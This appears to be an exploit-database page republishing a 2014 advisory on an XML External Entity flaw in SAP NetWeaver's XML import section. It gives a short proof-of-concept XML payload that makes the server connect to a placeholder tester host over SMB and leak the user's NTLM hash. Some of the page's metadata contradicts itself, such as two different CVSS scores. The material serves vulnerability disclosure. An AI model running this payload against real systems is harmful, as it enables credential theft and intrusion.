header-logo
Suggest Exploit
vendor:
Netwaver
by:
Lukasz Miedzinski
9,8
CVSS
CRITICAL
XML External Entity Injection
611
CWE
Product Name: Netwaver
Affected Version From: <7.01
Affected Version To: <7.01
Patch Exists: YES
Related CWE: CVE-2015-7241
CPE: SAP Netwear
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2014

SAP Netwaver – XML External Entity Injection

XML External Entity Injection vulnerability has been found in the XML parser in the System Administration->XML Content and Actions -> Import section. Example show how pentester is able to get NTLM hash of application's user. Content of file (PoC) : <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "file:////Tester.IP/test"> %remote; %param1; ]><root/> When pentester has metasploit smb_capture module run, then application will contatc him and provide NTLM hash of user.

Mitigation:

Vendor advisories (only for customers): External ID : 851975 2014 Title: XML External Entity vulnerability in SAP XML Parser Security Note: 2098608 Advisory Plan Date: 12/5/2014 Delivery date of fix/Patch Day: 10/2/2014
Source

Exploit-DB raw data:

Title: SAP Netwaver - XML External Entity Injection
Author: Lukasz Miedzinski
GPG: Public key provided in attachment
Date: 29/10/2014
CVE: CVE-2015-7241

Affected software :
===================

SAP Netwear : <7.01

Vendor advisories (only for customers):
===================
External ID : 851975 2014
Title:  XML External Entity vulnerability in SAP XML Parser
Security Note: 2098608
Advisory Plan Date: 12/5/2014
Delivery date of fix/Patch Day: 10/2/2014
CVSS Base Score: 5.5
CVSS Base Vector: AV:N/AC:L/AU:S/C:P/I:N/A:P


Description :
=============
XML External Entity Injection vulnerability has been found in the XML
parser in the System

Administration->XML Content and Actions -> Import section.


Vulnerabilities :
*****************

XML External Entity Injection :
======================


Example show how pentester is able to get NTLM hash of application's user.

Content of file (PoC) :

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "file:////Tester.IP/test"> %remote; %param1; ]>
<root/>

When pentester has metasploit smb_capture module run, then application
will contatc him and provide

NTLM hash of user.


Contact :
=========

Lukasz[dot]Miedzinski[at]gmail[dot]com

Navigation

Suggest Exploit

Services By CQR